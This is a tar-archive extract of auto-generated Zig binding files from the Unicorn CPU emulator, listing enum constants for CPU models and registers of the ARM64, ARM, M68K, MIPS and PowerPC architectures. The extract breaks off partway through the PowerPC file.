$@�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/�����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017247�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/arm64_const.zig��������������������������������������������������0000664�0000000�0000000�00000016143�14675241067�0022126�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const arm64Const = enum(c_int) { // ARM64 CPU CPU_ARM64_A57 = 0, CPU_ARM64_A53 = 1, CPU_ARM64_A72 = 2, CPU_ARM64_MAX = 3, CPU_ARM64_ENDING = 4, // ARM64 registers ARM64_REG_INVALID = 0, ARM64_REG_X29 = 1, ARM64_REG_X30 = 2, ARM64_REG_NZCV = 3, ARM64_REG_SP = 4, ARM64_REG_WSP = 5, ARM64_REG_WZR = 6, ARM64_REG_XZR = 7, ARM64_REG_B0 = 8, ARM64_REG_B1 = 9, ARM64_REG_B2 = 10, ARM64_REG_B3 = 11, ARM64_REG_B4 = 12, ARM64_REG_B5 = 13, ARM64_REG_B6 = 14, ARM64_REG_B7 = 15, ARM64_REG_B8 = 16, ARM64_REG_B9 = 17, ARM64_REG_B10 = 18, ARM64_REG_B11 = 19, ARM64_REG_B12 = 20, ARM64_REG_B13 = 21, ARM64_REG_B14 = 22, ARM64_REG_B15 = 23, ARM64_REG_B16 = 24, ARM64_REG_B17 = 25, ARM64_REG_B18 = 26, ARM64_REG_B19 = 27, ARM64_REG_B20 = 28, ARM64_REG_B21 = 29, ARM64_REG_B22 = 30, ARM64_REG_B23 = 31, ARM64_REG_B24 = 32, ARM64_REG_B25 = 33, ARM64_REG_B26 = 34, ARM64_REG_B27 = 35, ARM64_REG_B28 = 36, ARM64_REG_B29 = 37, ARM64_REG_B30 = 38, ARM64_REG_B31 = 39, ARM64_REG_D0 = 40, ARM64_REG_D1 = 41, ARM64_REG_D2 = 42, ARM64_REG_D3 = 43, ARM64_REG_D4 = 44, ARM64_REG_D5 = 45, ARM64_REG_D6 = 46, ARM64_REG_D7 = 47, ARM64_REG_D8 = 48, ARM64_REG_D9 = 49, ARM64_REG_D10 = 50, ARM64_REG_D11 = 51, ARM64_REG_D12 = 52, ARM64_REG_D13 = 53, ARM64_REG_D14 = 54, ARM64_REG_D15 = 55, ARM64_REG_D16 = 56, ARM64_REG_D17 = 57, ARM64_REG_D18 = 58, ARM64_REG_D19 = 59, ARM64_REG_D20 = 60, ARM64_REG_D21 = 61, ARM64_REG_D22 = 62, ARM64_REG_D23 = 63, ARM64_REG_D24 = 64, ARM64_REG_D25 = 65, ARM64_REG_D26 = 66, ARM64_REG_D27 = 67, ARM64_REG_D28 = 68, ARM64_REG_D29 = 69, ARM64_REG_D30 = 70, ARM64_REG_D31 = 71, ARM64_REG_H0 = 72, ARM64_REG_H1 = 73, ARM64_REG_H2 = 74, ARM64_REG_H3 = 75, ARM64_REG_H4 = 76, ARM64_REG_H5 = 77, ARM64_REG_H6 = 78, ARM64_REG_H7 = 79, ARM64_REG_H8 = 80, ARM64_REG_H9 = 81, ARM64_REG_H10 = 82, ARM64_REG_H11 = 83, ARM64_REG_H12 = 84, ARM64_REG_H13 = 85, ARM64_REG_H14 = 86, ARM64_REG_H15 = 87, ARM64_REG_H16 = 88, ARM64_REG_H17 = 89, ARM64_REG_H18 = 90, ARM64_REG_H19 = 91, ARM64_REG_H20 = 92, ARM64_REG_H21 = 93, ARM64_REG_H22 = 94, ARM64_REG_H23 = 95, ARM64_REG_H24 = 96, ARM64_REG_H25 = 97, ARM64_REG_H26 = 98, ARM64_REG_H27 = 99, ARM64_REG_H28 = 100, ARM64_REG_H29 = 101, ARM64_REG_H30 = 102, ARM64_REG_H31 = 103, ARM64_REG_Q0 = 104, ARM64_REG_Q1 = 105, ARM64_REG_Q2 = 106, ARM64_REG_Q3 = 107, ARM64_REG_Q4 = 108, ARM64_REG_Q5 = 109, ARM64_REG_Q6 = 110, ARM64_REG_Q7 = 111, ARM64_REG_Q8 = 112, ARM64_REG_Q9 = 113, ARM64_REG_Q10 = 114, ARM64_REG_Q11 = 115, ARM64_REG_Q12 = 116, ARM64_REG_Q13 = 117, ARM64_REG_Q14 = 118, ARM64_REG_Q15 = 119, ARM64_REG_Q16 = 120, ARM64_REG_Q17 = 121, ARM64_REG_Q18 = 122, ARM64_REG_Q19 = 123, ARM64_REG_Q20 = 124, ARM64_REG_Q21 = 125, ARM64_REG_Q22 = 126, ARM64_REG_Q23 = 127, ARM64_REG_Q24 = 128, ARM64_REG_Q25 = 129, ARM64_REG_Q26 = 130, ARM64_REG_Q27 = 131, ARM64_REG_Q28 = 132, ARM64_REG_Q29 = 133, ARM64_REG_Q30 = 134, ARM64_REG_Q31 = 135, ARM64_REG_S0 = 136, ARM64_REG_S1 = 137, ARM64_REG_S2 = 138, ARM64_REG_S3 = 139, ARM64_REG_S4 = 140, ARM64_REG_S5 = 141, ARM64_REG_S6 = 142, ARM64_REG_S7 = 143, ARM64_REG_S8 = 144, ARM64_REG_S9 = 145, ARM64_REG_S10 = 146, ARM64_REG_S11 = 147, ARM64_REG_S12 = 148, ARM64_REG_S13 = 149, ARM64_REG_S14 = 150, ARM64_REG_S15 = 151, ARM64_REG_S16 = 152, ARM64_REG_S17 = 153, ARM64_REG_S18 = 154, ARM64_REG_S19 = 155, ARM64_REG_S20 = 156, ARM64_REG_S21 = 157, ARM64_REG_S22 = 158, ARM64_REG_S23 = 159, ARM64_REG_S24 = 160, ARM64_REG_S25 = 161, ARM64_REG_S26 = 162, ARM64_REG_S27 = 163, ARM64_REG_S28 = 164, ARM64_REG_S29 = 165, ARM64_REG_S30 = 166, ARM64_REG_S31 = 167, ARM64_REG_W0 = 168, ARM64_REG_W1 = 169, ARM64_REG_W2 = 170, ARM64_REG_W3 = 171, ARM64_REG_W4 = 172, ARM64_REG_W5 = 173, ARM64_REG_W6 = 174, ARM64_REG_W7 = 175, ARM64_REG_W8 = 176, ARM64_REG_W9 = 177, ARM64_REG_W10 = 178, ARM64_REG_W11 = 179, ARM64_REG_W12 = 180, ARM64_REG_W13 = 181, ARM64_REG_W14 = 182, ARM64_REG_W15 = 183, ARM64_REG_W16 = 184, ARM64_REG_W17 = 185, ARM64_REG_W18 = 186, ARM64_REG_W19 = 187, ARM64_REG_W20 = 188, ARM64_REG_W21 = 189, ARM64_REG_W22 = 190, ARM64_REG_W23 = 191, ARM64_REG_W24 = 192, ARM64_REG_W25 = 193, ARM64_REG_W26 = 194, ARM64_REG_W27 = 195, ARM64_REG_W28 = 196, ARM64_REG_W29 = 197, ARM64_REG_W30 = 198, ARM64_REG_X0 = 199, ARM64_REG_X1 = 200, ARM64_REG_X2 = 201, ARM64_REG_X3 = 202, ARM64_REG_X4 = 203, ARM64_REG_X5 = 204, ARM64_REG_X6 = 205, ARM64_REG_X7 = 206, ARM64_REG_X8 = 207, ARM64_REG_X9 = 208, ARM64_REG_X10 = 209, ARM64_REG_X11 = 210, ARM64_REG_X12 = 211, ARM64_REG_X13 = 212, ARM64_REG_X14 = 213, ARM64_REG_X15 = 214, ARM64_REG_X16 = 215, ARM64_REG_X17 = 216, ARM64_REG_X18 = 217, ARM64_REG_X19 = 218, ARM64_REG_X20 = 219, ARM64_REG_X21 = 220, ARM64_REG_X22 = 221, ARM64_REG_X23 = 222, ARM64_REG_X24 = 223, ARM64_REG_X25 = 224, ARM64_REG_X26 = 225, ARM64_REG_X27 = 226, ARM64_REG_X28 = 227, ARM64_REG_V0 = 228, ARM64_REG_V1 = 229, ARM64_REG_V2 = 230, ARM64_REG_V3 = 231, ARM64_REG_V4 = 232, ARM64_REG_V5 = 233, ARM64_REG_V6 = 234, ARM64_REG_V7 = 235, ARM64_REG_V8 = 236, ARM64_REG_V9 = 237, ARM64_REG_V10 = 238, ARM64_REG_V11 = 239, ARM64_REG_V12 = 240, ARM64_REG_V13 = 241, ARM64_REG_V14 = 242, ARM64_REG_V15 = 243, ARM64_REG_V16 = 244, ARM64_REG_V17 = 245, ARM64_REG_V18 = 246, ARM64_REG_V19 = 247, ARM64_REG_V20 = 248, ARM64_REG_V21 = 249, ARM64_REG_V22 = 250, ARM64_REG_V23 = 251, ARM64_REG_V24 = 252, ARM64_REG_V25 = 253, ARM64_REG_V26 = 254, ARM64_REG_V27 = 255, ARM64_REG_V28 = 256, ARM64_REG_V29 = 257, ARM64_REG_V30 = 258, ARM64_REG_V31 = 259, // pseudo registers ARM64_REG_PC = 260, ARM64_REG_CPACR_EL1 = 261, // thread registers, depreciated, use UC_ARM64_REG_CP_REG instead ARM64_REG_TPIDR_EL0 = 262, ARM64_REG_TPIDRRO_EL0 = 263, ARM64_REG_TPIDR_EL1 = 264, ARM64_REG_PSTATE = 265, // exception link registers, depreciated, use UC_ARM64_REG_CP_REG instead ARM64_REG_ELR_EL0 = 266, ARM64_REG_ELR_EL1 = 267, ARM64_REG_ELR_EL2 = 268, ARM64_REG_ELR_EL3 = 269, // stack pointers registers, depreciated, use UC_ARM64_REG_CP_REG instead ARM64_REG_SP_EL0 = 270, ARM64_REG_SP_EL1 = 271, ARM64_REG_SP_EL2 = 272, ARM64_REG_SP_EL3 = 273, // other CP15 registers, depreciated, use UC_ARM64_REG_CP_REG instead ARM64_REG_TTBR0_EL1 = 274, ARM64_REG_TTBR1_EL1 = 275, ARM64_REG_ESR_EL0 = 276, ARM64_REG_ESR_EL1 = 277, ARM64_REG_ESR_EL2 = 278, ARM64_REG_ESR_EL3 = 279, ARM64_REG_FAR_EL0 = 280, ARM64_REG_FAR_EL1 = 281, ARM64_REG_FAR_EL2 = 282, ARM64_REG_FAR_EL3 = 283, ARM64_REG_PAR_EL1 = 284, ARM64_REG_MAIR_EL1 = 285, ARM64_REG_VBAR_EL0 = 286, ARM64_REG_VBAR_EL1 = 287, ARM64_REG_VBAR_EL2 = 288, ARM64_REG_VBAR_EL3 = 289, ARM64_REG_CP_REG = 290, // floating point control and status registers ARM64_REG_FPCR = 291, ARM64_REG_FPSR = 292, ARM64_REG_ENDING = 293, // alias registers ARM64_REG_IP0 = 215, ARM64_REG_IP1 = 216, ARM64_REG_FP = 1, ARM64_REG_LR = 2, // ARM64 instructions ARM64_INS_INVALID = 0, ARM64_INS_MRS = 1, ARM64_INS_MSR = 2, ARM64_INS_SYS = 3, ARM64_INS_SYSL = 4, ARM64_INS_ENDING = 5, }; �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/arm_const.zig����������������������������������������������������0000664�0000000�0000000�00000007514�14675241067�0021756�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const armConst = enum(c_int) { // ARM CPU CPU_ARM_926 = 0, CPU_ARM_946 = 1, CPU_ARM_1026 = 2, CPU_ARM_1136_R2 = 3, CPU_ARM_1136 = 4, CPU_ARM_1176 = 5, CPU_ARM_11MPCORE = 6, CPU_ARM_CORTEX_M0 = 7, CPU_ARM_CORTEX_M3 = 8, CPU_ARM_CORTEX_M4 = 9, CPU_ARM_CORTEX_M7 = 10, CPU_ARM_CORTEX_M33 = 11, CPU_ARM_CORTEX_R5 = 12, CPU_ARM_CORTEX_R5F = 13, CPU_ARM_CORTEX_A7 = 14, CPU_ARM_CORTEX_A8 = 15, CPU_ARM_CORTEX_A9 = 16, CPU_ARM_CORTEX_A15 = 17, CPU_ARM_TI925T = 18, CPU_ARM_SA1100 = 19, CPU_ARM_SA1110 = 20, CPU_ARM_PXA250 = 21, CPU_ARM_PXA255 = 22, CPU_ARM_PXA260 = 23, CPU_ARM_PXA261 = 24, CPU_ARM_PXA262 = 25, CPU_ARM_PXA270 = 26, CPU_ARM_PXA270A0 = 27, CPU_ARM_PXA270A1 = 28, CPU_ARM_PXA270B0 = 29, CPU_ARM_PXA270B1 = 30, CPU_ARM_PXA270C0 = 31, CPU_ARM_PXA270C5 = 32, CPU_ARM_MAX = 33, CPU_ARM_ENDING = 34, // ARM registers ARM_REG_INVALID = 0, ARM_REG_APSR = 1, ARM_REG_APSR_NZCV = 2, ARM_REG_CPSR = 3, ARM_REG_FPEXC = 4, ARM_REG_FPINST = 5, ARM_REG_FPSCR = 6, ARM_REG_FPSCR_NZCV = 7, ARM_REG_FPSID = 8, ARM_REG_ITSTATE = 9, ARM_REG_LR = 10, ARM_REG_PC = 11, ARM_REG_SP = 12, ARM_REG_SPSR = 13, ARM_REG_D0 = 14, ARM_REG_D1 = 15, ARM_REG_D2 = 16, ARM_REG_D3 = 17, ARM_REG_D4 = 18, ARM_REG_D5 = 19, ARM_REG_D6 = 20, ARM_REG_D7 = 21, ARM_REG_D8 = 22, ARM_REG_D9 = 23, ARM_REG_D10 = 24, ARM_REG_D11 = 25, ARM_REG_D12 = 26, ARM_REG_D13 = 27, ARM_REG_D14 = 28, ARM_REG_D15 = 29, ARM_REG_D16 = 30, ARM_REG_D17 = 31, ARM_REG_D18 = 32, ARM_REG_D19 = 33, ARM_REG_D20 = 34, ARM_REG_D21 = 35, ARM_REG_D22 = 36, ARM_REG_D23 = 37, ARM_REG_D24 = 38, ARM_REG_D25 = 39, ARM_REG_D26 = 40, ARM_REG_D27 = 41, ARM_REG_D28 = 42, ARM_REG_D29 = 43, ARM_REG_D30 = 44, ARM_REG_D31 = 45, ARM_REG_FPINST2 = 46, ARM_REG_MVFR0 = 47, ARM_REG_MVFR1 = 48, ARM_REG_MVFR2 = 49, ARM_REG_Q0 = 50, ARM_REG_Q1 = 51, ARM_REG_Q2 = 52, ARM_REG_Q3 = 53, ARM_REG_Q4 = 54, ARM_REG_Q5 = 55, ARM_REG_Q6 = 56, ARM_REG_Q7 = 57, ARM_REG_Q8 = 58, ARM_REG_Q9 = 59, ARM_REG_Q10 = 60, ARM_REG_Q11 = 61, ARM_REG_Q12 = 62, ARM_REG_Q13 = 63, ARM_REG_Q14 = 64, ARM_REG_Q15 = 65, ARM_REG_R0 = 66, ARM_REG_R1 = 67, ARM_REG_R2 = 68, ARM_REG_R3 = 69, ARM_REG_R4 = 70, ARM_REG_R5 = 71, ARM_REG_R6 = 72, ARM_REG_R7 = 73, ARM_REG_R8 = 74, ARM_REG_R9 = 75, ARM_REG_R10 = 76, ARM_REG_R11 = 77, ARM_REG_R12 = 78, ARM_REG_S0 = 79, ARM_REG_S1 = 80, ARM_REG_S2 = 81, ARM_REG_S3 = 82, ARM_REG_S4 = 83, ARM_REG_S5 = 84, ARM_REG_S6 = 85, ARM_REG_S7 = 86, ARM_REG_S8 = 87, ARM_REG_S9 = 88, ARM_REG_S10 = 89, ARM_REG_S11 = 90, ARM_REG_S12 = 91, ARM_REG_S13 = 92, ARM_REG_S14 = 93, ARM_REG_S15 = 94, ARM_REG_S16 = 95, ARM_REG_S17 = 96, ARM_REG_S18 = 97, ARM_REG_S19 = 98, ARM_REG_S20 = 99, ARM_REG_S21 = 100, ARM_REG_S22 = 101, ARM_REG_S23 = 102, ARM_REG_S24 = 103, ARM_REG_S25 = 104, ARM_REG_S26 = 105, ARM_REG_S27 = 106, ARM_REG_S28 = 107, ARM_REG_S29 = 108, ARM_REG_S30 = 109, ARM_REG_S31 = 110, ARM_REG_C1_C0_2 = 111, ARM_REG_C13_C0_2 = 112, ARM_REG_C13_C0_3 = 113, ARM_REG_IPSR = 114, ARM_REG_MSP = 115, ARM_REG_PSP = 116, ARM_REG_CONTROL = 117, ARM_REG_IAPSR = 118, ARM_REG_EAPSR = 119, ARM_REG_XPSR = 120, ARM_REG_EPSR = 121, ARM_REG_IEPSR = 122, ARM_REG_PRIMASK = 123, ARM_REG_BASEPRI = 124, ARM_REG_BASEPRI_MAX = 125, ARM_REG_FAULTMASK = 126, ARM_REG_APSR_NZCVQ = 127, ARM_REG_APSR_G = 128, ARM_REG_APSR_NZCVQG = 129, ARM_REG_IAPSR_NZCVQ = 130, ARM_REG_IAPSR_G = 131, ARM_REG_IAPSR_NZCVQG = 132, ARM_REG_EAPSR_NZCVQ = 133, ARM_REG_EAPSR_G = 134, ARM_REG_EAPSR_NZCVQG = 135, ARM_REG_XPSR_NZCVQ = 136, ARM_REG_XPSR_G = 137, ARM_REG_XPSR_NZCVQG = 138, ARM_REG_CP_REG = 139, ARM_REG_ENDING = 140, // alias registers ARM_REG_R13 = 12, ARM_REG_R14 = 10, ARM_REG_R15 = 11, ARM_REG_SB = 75, ARM_REG_SL = 76, ARM_REG_FP = 77, ARM_REG_IP = 78, }; ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/m68k_const.zig���������������������������������������������������0000664�0000000�0000000�00000001324�14675241067�0021755�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const m68kConst = enum(c_int) { // M68K CPU CPU_M68K_M5206 = 0, CPU_M68K_M68000 = 1, CPU_M68K_M68020 = 2, CPU_M68K_M68030 = 3, CPU_M68K_M68040 = 4, CPU_M68K_M68060 = 5, CPU_M68K_M5208 = 6, CPU_M68K_CFV4E = 7, CPU_M68K_ANY = 8, CPU_M68K_ENDING = 9, // M68K registers M68K_REG_INVALID = 0, M68K_REG_A0 = 1, M68K_REG_A1 = 2, M68K_REG_A2 = 3, M68K_REG_A3 = 4, M68K_REG_A4 = 5, M68K_REG_A5 = 6, M68K_REG_A6 = 7, M68K_REG_A7 = 8, M68K_REG_D0 = 9, M68K_REG_D1 = 10, M68K_REG_D2 = 11, M68K_REG_D3 = 12, M68K_REG_D4 = 13, M68K_REG_D5 = 14, M68K_REG_D6 = 15, M68K_REG_D7 = 16, M68K_REG_SR = 17, M68K_REG_PC = 18, M68K_REG_ENDING = 19, }; ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/mips_const.zig���������������������������������������������������0000664�0000000�0000000�00000011134�14675241067�0022140�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const mipsConst = enum(c_int) { // MIPS32 CPUS CPU_MIPS32_4KC = 0, CPU_MIPS32_4KM = 1, CPU_MIPS32_4KECR1 = 2, CPU_MIPS32_4KEMR1 = 3, CPU_MIPS32_4KEC = 4, CPU_MIPS32_4KEM = 5, CPU_MIPS32_24KC = 6, CPU_MIPS32_24KEC = 7, CPU_MIPS32_24KF = 8, CPU_MIPS32_34KF = 9, CPU_MIPS32_74KF = 10, CPU_MIPS32_M14K = 11, CPU_MIPS32_M14KC = 12, CPU_MIPS32_P5600 = 13, CPU_MIPS32_MIPS32R6_GENERIC = 14, CPU_MIPS32_I7200 = 15, CPU_MIPS32_ENDING = 16, // MIPS64 CPUS CPU_MIPS64_R4000 = 0, CPU_MIPS64_VR5432 = 1, CPU_MIPS64_5KC = 2, CPU_MIPS64_5KF = 3, CPU_MIPS64_20KC = 4, CPU_MIPS64_MIPS64R2_GENERIC = 5, CPU_MIPS64_5KEC = 6, CPU_MIPS64_5KEF = 7, CPU_MIPS64_I6400 = 8, CPU_MIPS64_I6500 = 9, CPU_MIPS64_LOONGSON_2E = 10, CPU_MIPS64_LOONGSON_2F = 11, CPU_MIPS64_MIPS64DSPR2 = 12, CPU_MIPS64_ENDING = 13, // MIPS registers MIPS_REG_INVALID = 0, // General purpose registers MIPS_REG_PC = 1, MIPS_REG_0 = 2, MIPS_REG_1 = 3, MIPS_REG_2 = 4, MIPS_REG_3 = 5, MIPS_REG_4 = 6, MIPS_REG_5 = 7, MIPS_REG_6 = 8, MIPS_REG_7 = 9, MIPS_REG_8 = 10, MIPS_REG_9 = 11, MIPS_REG_10 = 12, MIPS_REG_11 = 13, MIPS_REG_12 = 14, MIPS_REG_13 = 15, MIPS_REG_14 = 16, MIPS_REG_15 = 17, MIPS_REG_16 = 18, MIPS_REG_17 = 19, MIPS_REG_18 = 20, MIPS_REG_19 = 21, MIPS_REG_20 = 22, MIPS_REG_21 = 23, MIPS_REG_22 = 24, MIPS_REG_23 = 25, MIPS_REG_24 = 26, MIPS_REG_25 = 27, MIPS_REG_26 = 28, MIPS_REG_27 = 29, MIPS_REG_28 = 30, MIPS_REG_29 = 31, MIPS_REG_30 = 32, MIPS_REG_31 = 33, // DSP registers MIPS_REG_DSPCCOND = 34, MIPS_REG_DSPCARRY = 35, MIPS_REG_DSPEFI = 36, MIPS_REG_DSPOUTFLAG = 37, MIPS_REG_DSPOUTFLAG16_19 = 38, MIPS_REG_DSPOUTFLAG20 = 39, MIPS_REG_DSPOUTFLAG21 = 40, MIPS_REG_DSPOUTFLAG22 = 41, MIPS_REG_DSPOUTFLAG23 = 42, MIPS_REG_DSPPOS = 43, MIPS_REG_DSPSCOUNT = 44, // ACC registers MIPS_REG_AC0 = 45, MIPS_REG_AC1 = 46, MIPS_REG_AC2 = 47, MIPS_REG_AC3 = 48, // COP registers MIPS_REG_CC0 = 49, MIPS_REG_CC1 = 50, MIPS_REG_CC2 = 51, MIPS_REG_CC3 = 52, MIPS_REG_CC4 = 53, MIPS_REG_CC5 = 54, MIPS_REG_CC6 = 55, MIPS_REG_CC7 = 56, // FPU registers MIPS_REG_F0 = 57, MIPS_REG_F1 = 58, MIPS_REG_F2 = 59, MIPS_REG_F3 = 60, MIPS_REG_F4 = 61, MIPS_REG_F5 = 62, MIPS_REG_F6 = 63, MIPS_REG_F7 = 64, MIPS_REG_F8 = 65, MIPS_REG_F9 = 66, MIPS_REG_F10 = 67, MIPS_REG_F11 = 68, MIPS_REG_F12 = 69, MIPS_REG_F13 = 70, MIPS_REG_F14 = 71, MIPS_REG_F15 = 72, MIPS_REG_F16 = 73, MIPS_REG_F17 = 74, MIPS_REG_F18 = 75, MIPS_REG_F19 = 76, MIPS_REG_F20 = 77, MIPS_REG_F21 = 78, MIPS_REG_F22 = 79, MIPS_REG_F23 = 80, MIPS_REG_F24 = 81, MIPS_REG_F25 = 82, MIPS_REG_F26 = 83, MIPS_REG_F27 = 84, MIPS_REG_F28 = 85, MIPS_REG_F29 = 86, MIPS_REG_F30 = 87, MIPS_REG_F31 = 88, MIPS_REG_FCC0 = 89, MIPS_REG_FCC1 = 90, MIPS_REG_FCC2 = 91, MIPS_REG_FCC3 = 92, MIPS_REG_FCC4 = 93, MIPS_REG_FCC5 = 94, MIPS_REG_FCC6 = 95, MIPS_REG_FCC7 = 96, // AFPR128 MIPS_REG_W0 = 97, MIPS_REG_W1 = 98, MIPS_REG_W2 = 99, MIPS_REG_W3 = 100, MIPS_REG_W4 = 101, MIPS_REG_W5 = 102, MIPS_REG_W6 = 103, MIPS_REG_W7 = 104, MIPS_REG_W8 = 105, MIPS_REG_W9 = 106, MIPS_REG_W10 = 107, MIPS_REG_W11 = 108, MIPS_REG_W12 = 109, MIPS_REG_W13 = 110, MIPS_REG_W14 = 111, MIPS_REG_W15 = 112, MIPS_REG_W16 = 113, MIPS_REG_W17 = 114, MIPS_REG_W18 = 115, MIPS_REG_W19 = 116, MIPS_REG_W20 = 117, MIPS_REG_W21 = 118, MIPS_REG_W22 = 119, MIPS_REG_W23 = 120, MIPS_REG_W24 = 121, MIPS_REG_W25 = 122, MIPS_REG_W26 = 123, MIPS_REG_W27 = 124, MIPS_REG_W28 = 125, MIPS_REG_W29 = 126, MIPS_REG_W30 = 127, MIPS_REG_W31 = 128, MIPS_REG_HI = 129, MIPS_REG_LO = 130, MIPS_REG_P0 = 131, MIPS_REG_P1 = 132, MIPS_REG_P2 = 133, MIPS_REG_MPL0 = 134, MIPS_REG_MPL1 = 135, MIPS_REG_MPL2 = 136, MIPS_REG_CP0_CONFIG3 = 137, MIPS_REG_CP0_USERLOCAL = 138, MIPS_REG_CP0_STATUS = 139, MIPS_REG_ENDING = 140, MIPS_REG_ZERO = 2, MIPS_REG_AT = 3, MIPS_REG_V0 = 4, MIPS_REG_V1 = 5, MIPS_REG_A0 = 6, MIPS_REG_A1 = 7, MIPS_REG_A2 = 8, MIPS_REG_A3 = 9, MIPS_REG_T0 = 10, MIPS_REG_T1 = 11, MIPS_REG_T2 = 12, MIPS_REG_T3 = 13, MIPS_REG_T4 = 14, MIPS_REG_T5 = 15, MIPS_REG_T6 = 16, MIPS_REG_T7 = 17, MIPS_REG_S0 = 18, MIPS_REG_S1 = 19, MIPS_REG_S2 = 20, MIPS_REG_S3 = 21, MIPS_REG_S4 = 22, MIPS_REG_S5 = 23, MIPS_REG_S6 = 24, MIPS_REG_S7 = 25, MIPS_REG_T8 = 26, MIPS_REG_T9 = 27, MIPS_REG_K0 = 28, MIPS_REG_K1 = 29, MIPS_REG_GP = 30, MIPS_REG_SP = 31, MIPS_REG_FP = 32, MIPS_REG_S8 = 32, MIPS_REG_RA = 33, MIPS_REG_HI0 = 45, MIPS_REG_HI1 = 46, MIPS_REG_HI2 = 47, MIPS_REG_HI3 = 48, MIPS_REG_LO0 = 45, MIPS_REG_LO1 = 46, MIPS_REG_LO2 = 47, MIPS_REG_LO3 = 48, }; ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/ppc_const.zig����������������������������������������������������0000664�0000000�0000000�00000023602�14675241067�0021755�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const ppcConst = enum(c_int) { // PPC CPU CPU_PPC32_401 = 0, CPU_PPC32_401A1 = 1, CPU_PPC32_401B2 = 2, CPU_PPC32_401C2 = 3, CPU_PPC32_401D2 = 4, CPU_PPC32_401E2 = 5, CPU_PPC32_401F2 = 6, CPU_PPC32_401G2 = 7, CPU_PPC32_IOP480 = 8, CPU_PPC32_COBRA = 9, CPU_PPC32_403GA = 10, CPU_PPC32_403GB = 11, CPU_PPC32_403GC = 12, CPU_PPC32_403GCX = 13, CPU_PPC32_405D2 = 14, CPU_PPC32_405D4 = 15, CPU_PPC32_405CRA = 16, CPU_PPC32_405CRB = 17, CPU_PPC32_405CRC = 18, CPU_PPC32_405EP = 19, CPU_PPC32_405EZ = 20, CPU_PPC32_405GPA = 21, CPU_PPC32_405GPB = 22, CPU_PPC32_405GPC = 23, CPU_PPC32_405GPD = 24, CPU_PPC32_405GPR = 25, CPU_PPC32_405LP = 26, CPU_PPC32_NPE405H = 27, CPU_PPC32_NPE405H2 = 28, CPU_PPC32_NPE405L = 29, CPU_PPC32_NPE4GS3 = 30, CPU_PPC32_STB03 = 31, CPU_PPC32_STB04 = 32, CPU_PPC32_STB25 = 33, CPU_PPC32_X2VP4 = 34, CPU_PPC32_X2VP20 = 35, CPU_PPC32_440_XILINX = 36, CPU_PPC32_440_XILINX_W_DFPU = 37, CPU_PPC32_440EPA = 38, CPU_PPC32_440EPB = 39, CPU_PPC32_440EPX = 40, CPU_PPC32_460EXB = 41, CPU_PPC32_G2 = 42, CPU_PPC32_G2H4 = 43, CPU_PPC32_G2GP = 44, CPU_PPC32_G2LS = 45, CPU_PPC32_G2HIP3 = 46, CPU_PPC32_G2HIP4 = 47, CPU_PPC32_MPC603 = 48, CPU_PPC32_G2LE = 49, CPU_PPC32_G2LEGP = 50, CPU_PPC32_G2LELS = 51, CPU_PPC32_G2LEGP1 = 52, CPU_PPC32_G2LEGP3 = 53, CPU_PPC32_MPC5200_V10 = 54, CPU_PPC32_MPC5200_V11 = 55, CPU_PPC32_MPC5200_V12 = 56, CPU_PPC32_MPC5200B_V20 = 57, CPU_PPC32_MPC5200B_V21 = 58, CPU_PPC32_E200Z5 = 59, CPU_PPC32_E200Z6 = 60, CPU_PPC32_E300C1 = 61, CPU_PPC32_E300C2 = 62, CPU_PPC32_E300C3 = 63, CPU_PPC32_E300C4 = 64, CPU_PPC32_MPC8343 = 65, CPU_PPC32_MPC8343A = 66, CPU_PPC32_MPC8343E = 67, CPU_PPC32_MPC8343EA = 68, CPU_PPC32_MPC8347T = 69, CPU_PPC32_MPC8347P = 70, CPU_PPC32_MPC8347AT = 71, CPU_PPC32_MPC8347AP = 72, CPU_PPC32_MPC8347ET = 73, CPU_PPC32_MPC8347EP = 74, CPU_PPC32_MPC8347EAT = 75, CPU_PPC32_MPC8347EAP = 76, CPU_PPC32_MPC8349 = 77, CPU_PPC32_MPC8349A = 78, CPU_PPC32_MPC8349E = 79, CPU_PPC32_MPC8349EA = 80, CPU_PPC32_MPC8377 = 81, CPU_PPC32_MPC8377E = 82, CPU_PPC32_MPC8378 = 83, CPU_PPC32_MPC8378E = 84, CPU_PPC32_MPC8379 = 85, CPU_PPC32_MPC8379E = 86, CPU_PPC32_E500_V10 = 87, CPU_PPC32_E500_V20 = 88, CPU_PPC32_E500V2_V10 = 89, CPU_PPC32_E500V2_V20 = 90, CPU_PPC32_E500V2_V21 = 91, CPU_PPC32_E500V2_V22 = 92, CPU_PPC32_E500V2_V30 = 93, CPU_PPC32_E500MC = 94, 